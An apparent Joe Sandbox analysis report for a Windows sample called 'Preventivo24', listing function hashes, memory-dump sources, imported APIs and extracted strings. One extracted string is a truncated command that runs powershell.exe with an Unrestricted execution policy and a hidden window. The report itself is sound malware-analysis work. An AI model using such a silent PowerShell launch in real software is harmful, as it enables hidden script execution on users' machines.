Opcode ID: 96c8ddd3dc153e4033eea131c39aa06618a942a236ae422295928c0912bf33f3
Instruction ID: 19129cf04d164f5f1bc5a295f7d0f4c002b726f52b467da8ce4954df40b7b71e
Opcode Fuzzy Hash: 96c8ddd3dc153e4033eea131c39aa06618a942a236ae422295928c0912bf33f3
Instruction Fuzzy Hash: C551662650D7C24FD3134F3898926C2BFA0EF9722079E89EEC4D18F963D2691557C782

Uniqueness

Uniqueness Score: -1.00%

Function 00E98BD0 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e55f8b63cf12ec9d8b1206c9b5207b889d81944be8d8bf4210f240d57ef76b5b
Instruction ID: cf945a5376dcd10ca058a8f86ef60ec87d88bf43bdf09a25d79262e4a658eb05
Opcode Fuzzy Hash: e55f8b63cf12ec9d8b1206c9b5207b889d81944be8d8bf4210f240d57ef76b5b
Instruction Fuzzy Hash: 887116B1801B48CFE760CF78C94478ABBF0BB05324F148A5DD4A99B3D0D3B9A648CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0101DA00 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4656d9187c3eb45198852bdd1350489bfbafbd6df43d62ce5caaa60aed31f809
Instruction ID: 9841ae8277ba2bdc0f6aaa8d977b3bfb295d3cfaa9f78cb8ad85ce92fd75e830
Opcode Fuzzy Hash: 4656d9187c3eb45198852bdd1350489bfbafbd6df43d62ce5caaa60aed31f809
Instruction Fuzzy Hash: A6416D2230D2429FDB1DCE5D54A92BEBBE1FBD5114B8805AFE4C3CB346EA599807C391

Uniqueness

Uniqueness Score: -1.00%

Function 009A4942 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1697655494.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, Offset: 009A2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_9a2000_Preventivo24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c4492a75396e03738123edc7d706dd10de40b9c6eb157c758def20f755700c4
Instruction ID: bbf2cdfeb8a873384cc8309058388cf4e660fad67e41ab4a91f86f6ec6811cc3
Opcode Fuzzy Hash: 2c4492a75396e03738123edc7d706dd10de40b9c6eb157c758def20f755700c4
Instruction Fuzzy Hash: 6831342115D3C24FC7134B788896682BFA0EF53220B5E8ADEC4D08F4A3E3691557DB56

Uniqueness

Uniqueness Score: -1.00%

Function 01073650 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d2cf9cbdaf9e25dd5b90dd5a39bd7432da9f886552d1b7104aaf82958de7a4f
Instruction ID: f9e7494b988ec397fb0172c11e832ec99cea09993bbcb323c1e803587abe0c4d
Opcode Fuzzy Hash: 3d2cf9cbdaf9e25dd5b90dd5a39bd7432da9f886552d1b7104aaf82958de7a4f
Instruction Fuzzy Hash: ED2127367719120B9B8CCA2DDC76A7932E2E3852017C8D27DEAABCB3C9D7388451C740

Uniqueness

Uniqueness Score: -1.00%

Function 00F555C0 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b94a53c78a7a73cf76fd4f958e5316573c583ba9ea0f02250357a0fb61ce9e88
Instruction ID: d6319d87ad2807cbed1360f7b863175e81f902f408664173aaca9723cdcf500f
Opcode Fuzzy Hash: b94a53c78a7a73cf76fd4f958e5316573c583ba9ea0f02250357a0fb61ce9e88
Instruction Fuzzy Hash: EB4106B0905745EFD708CF69C50878AFBF0BB09318F20825DD468AB681D3BAA658CFD4

Uniqueness

Uniqueness Score: -1.00%

Function 00970251 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1699048395.0000000000961000.00000004.00000020.00020000.00000000.sdmp, Offset: 00961000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_961000_Preventivo24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d313788532264a4f4d5d35798d3a04ed1333d88433b80708b34369fd5ff7d98
Instruction ID: f5c061f037b6b7c5d8a72b951b6cd60fc57749063f206d321bd6717712ab9db3
Opcode Fuzzy Hash: 3d313788532264a4f4d5d35798d3a04ed1333d88433b80708b34369fd5ff7d98
Instruction Fuzzy Hash: D22123661092D58FC307CF34D5A4A82BFA1FF8B31639E80DCC9C18F427C2A5A942C752

Uniqueness

Uniqueness Score: -1.00%

Function 00EA2CE0 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c2cd24ac7462c75ca33399d2d6d27b08a4979392d23387c220b6a7f9e509e03
Instruction ID: 08576277e5df0fbc3db36aeccab8115f13312e4762c069106d43103d1fbc5e0a
Opcode Fuzzy Hash: 2c2cd24ac7462c75ca33399d2d6d27b08a4979392d23387c220b6a7f9e509e03
Instruction Fuzzy Hash: C431EFB0405B84CFE321CF29C65874BBFF0BB05718F108A5DD4A65BB91D3BAA148CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00E9B5C0 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3440cbba33878cc0151b931ac387d7025d1e809a86f283492bce86725cc2ffd
Instruction ID: 97c73a277078e30f2cf120d005edcbcae8d3d1463068b6de4f0161f99395a27a
Opcode Fuzzy Hash: a3440cbba33878cc0151b931ac387d7025d1e809a86f283492bce86725cc2ffd
Instruction Fuzzy Hash: 692148B1905348DFDB05CF58C54478ABBF4FB49318F2182AED414AB381D77A9A46CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00E9BC20 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90f2e70d76877428f70a31b5e915c7abab4808792a9e85aededc564f94b19514
Instruction ID: be2d8d40ae8ec02b154600231be271767c84e5479914219c9a5bd631e776f207
Opcode Fuzzy Hash: 90f2e70d76877428f70a31b5e915c7abab4808792a9e85aededc564f94b19514
Instruction Fuzzy Hash: 3E2148B1905388DFDB05CF58C54478ABBF4FB09318F2582AED424AB381D77A9A46CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00EBCDD0 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 419d850232222d3aebc3f1f1cb6fb19b1ca4041d2a3ef999867131c4d7b7e8cf
Instruction ID: ff1fedfcbcd9ba09ecf02185de27adeda828b859e8df6574f8021c5f7d06da3b
Opcode Fuzzy Hash: 419d850232222d3aebc3f1f1cb6fb19b1ca4041d2a3ef999867131c4d7b7e8cf
Instruction Fuzzy Hash: 4511EDF1905208DFD754CF58C544749BBF4FB09728F2082AEE8289B381D37A9A16CF84

Uniqueness

Uniqueness Score: -1.00%

Function 010A4796 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d176ef2f127bce71cd2462766d1e098243c6f5f53d53af48070be200a98ecf4
Instruction ID: e8d6cba3afd1cbebe2dddd1d9edef553b633e1d34fded0b8a889b38b3f59f1b7
Opcode Fuzzy Hash: 5d176ef2f127bce71cd2462766d1e098243c6f5f53d53af48070be200a98ecf4
Instruction Fuzzy Hash: A1F0A932A50225EFCB26CA8CC444A8DB7E8EB46AA0F654096E180EB241C2B0DE00CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 010A47DA Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84adcf6e336c4bae0f721f8d2f7d32daac37cdaf3c253ded2eee1c659e4a4c20
Instruction ID: 088a1b4a247948deb1aca10b8394e826a7bc609985132c40c8ca5cfb2fcd370e
Opcode Fuzzy Hash: 84adcf6e336c4bae0f721f8d2f7d32daac37cdaf3c253ded2eee1c659e4a4c20
Instruction Fuzzy Hash: 21E08C72A21268EBCB14DBCCD90498AF7ECEB84A00B5900A6B601E3100C2B0DE00C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 00FC71F0 Relevance: 31.8, APIs: 12, Strings: 6, Instructions: 293libraryloaderthreadCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(011D3180,B5580983,?), ref: 00FC7263
EnterCriticalSection.KERNEL32(011D3180,B5580983), ref: 00FC7278
GetCurrentProcess.KERNEL32 ref: 00FC7285
GetCurrentThread.KERNEL32 ref: 00FC7293
SymSetOptions.IMAGEHLP(80000016), ref: 00FC72C1
LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr,00000000), ref: 00FC7338
GetProcAddress.KERNEL32(00000000), ref: 00FC733F
SymInitialize.IMAGEHLP(00000000,00000000,00000001,01142730,00000000), ref: 00FC7385
StackWalk.IMAGEHLP(0000014C,?,00000000,?,?,00000000,00000000,*** Stack Trace (x86) ***,0000001F,?,?,?,00000000), ref: 00FC74C1
GetModuleHandleW.KERNEL32(00000000,*** Stack Trace (x86) ***,0000001F,?,?,?,00000000), ref: 00FC757A
SymCleanup.IMAGEHLP(00000000,00000000), ref: 00FC7693
LeaveCriticalSection.KERNEL32(011D3180,?,00000000), ref: 00FC76BE

Strings

MODULE_BASE_ADDRESS, xrefs: 00FC75C7
*** Stack Trace (x86) ***, xrefs: 00FC7457
SymFromAddr, xrefs: 00FC732E
<--------------------MORE--FRAMES-------------------->, xrefs: 00FC751D
[0x%.8Ix] , xrefs: 00FC7581
Dbghelp.dll, xrefs: 00FC7333

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: CriticalSection$CurrentInitialize$AddressCleanupEnterHandleLeaveLibraryLoadModuleOptionsProcProcessStackThreadWalk
String ID: *** Stack Trace (x86) ***$<--------------------MORE--FRAMES-------------------->$Dbghelp.dll$MODULE_BASE_ADDRESS$SymFromAddr$[0x%.8Ix]
API String ID: 4282195395-80696534
Opcode ID: 1ff2b32f3b9c7ca0cc14cd5563b6c7368f37b653206a5f4373a0770c474d7c9c
Instruction ID: c4d26b52810600a5b9653372985e6ad84e056e4523be2f26b3372600fe1920e3
Opcode Fuzzy Hash: 1ff2b32f3b9c7ca0cc14cd5563b6c7368f37b653206a5f4373a0770c474d7c9c
Instruction Fuzzy Hash: 2FD1BC70D086999FDB28EF24CD4ABEEBBB5AF04305F0001DAE859A7281DB745B84DF51

Uniqueness

Uniqueness Score: -1.00%

Function 00FFDC80 Relevance: 30.1, APIs: 9, Strings: 8, Instructions: 343COMMON

Download Yara Rule

Strings

ps1, xrefs: 00FFDD41, 00FFDD53, 00FFDD5D
Unable to create process: , xrefs: 00FFDEB8
Unable to find file , xrefs: 00FFDCB6
powershell.exe -NonInteractive -NoLogo -ExecutionPolicy Unrestricted -WindowStyle Hidden -Command "$host.UI.RawUI.BufferSize = new, xrefs: 00FFDE13
Unable to retrieve exit code from process., xrefs: 00FFE037
Unable to get a temp file for script output, temp path: , xrefs: 00FFDDB7
txt, xrefs: 00FFDD6E
Unable to retrieve PowerShell output from file: , xrefs: 00FFE014

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID:
String ID: Unable to create process: $Unable to find file $Unable to get a temp file for script output, temp path: $Unable to retrieve PowerShell output from file: $Unable to retrieve exit code from process.$powershell.exe -NonInteractive -NoLogo -ExecutionPolicy Unrestricted -WindowStyle Hidden -Command "$host.UI.RawUI.BufferSize = new$ps1$txt
API String ID: 0-4129021124
Opcode ID: 6ca92cb10186cb078308656189ac18f8179113f6ed2143698d842bf4ffca9eb6
Instruction ID: b15149ab7775e8210083f708597d86370ba2c584ae235db8cb0c0f337f30f3d0
Opcode Fuzzy Hash: 6ca92cb10186cb078308656189ac18f8179113f6ed2143698d842bf4ffca9eb6
Instruction Fuzzy Hash: D3D1EC31D00609EFDB14DFA8C905BAEFBB5BF08320F148159E525B72A1DB74AA41CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FB9680 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 398libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Advapi32.dll,B5580983,00000000,00000000), ref: 00FB9711
GetLastError.KERNEL32 ref: 00FB973F

Part of subcall function 00E8B070: RtlAllocateHeap.NTDLL(?,00000000,?,B5580983,00000000,010B1B00,000000FF,?,?,011C5D3C,?,?,01003AC7,80004005,B5580983,?), ref: 00E8B0BA

GetProcAddress.KERNEL32(00000000,ConvertStringSidToSidW), ref: 00FB9755
FreeLibrary.KERNEL32(00000000), ref: 00FB9771
GetLastError.KERNEL32 ref: 00FB977E
GetLastError.KERNEL32 ref: 00FB9975
GetLastError.KERNEL32 ref: 00FB99DA

Strings

ConvertStringSidToSidW, xrefs: 00FB974F
Advapi32.dll, xrefs: 00FB970C

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: ErrorLast$Library$AddressAllocateFreeHeapLoadProc
String ID: Advapi32.dll$ConvertStringSidToSidW
API String ID: 3460774402-1129428314
Opcode ID: a1189ab88b73464df440473e9ebfe3e7cf36c69b2d21ad57c2d84b2acbca8e54
Instruction ID: c8ecae7c0ff4d2a244a2338e8aeae620dfbb69405b18b5f249c0f5dd61af9109
Opcode Fuzzy Hash: a1189ab88b73464df440473e9ebfe3e7cf36c69b2d21ad57c2d84b2acbca8e54
Instruction Fuzzy Hash: 9CF169B1C09209EBDB10DFA5D9447EEBBB4FF49310F208119EA15B7280E774AA44DFA1

Uniqueness

Uniqueness Score: -1.00%

